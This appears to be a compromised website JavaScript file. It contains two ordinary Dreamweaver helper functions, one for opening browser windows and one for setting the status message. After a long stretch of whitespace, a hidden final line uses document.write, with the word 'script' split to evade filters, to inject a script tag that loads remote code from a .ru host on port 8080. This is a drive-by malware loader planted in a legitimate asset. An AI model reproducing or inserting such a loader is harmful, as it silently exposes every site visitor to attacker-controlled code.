function MM_openBrWindow(theURL,winName,features) { //v2.0
  window.open(theURL,winName,features);
  window.focus();
}
                                                                                                                                                                              
function MM_displayStatusMsg(msgStr) { //v1.0
  status=msgStr;
  document.MM_returnValue = true;
}

document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/LAN.js"></scr'+'ipt>');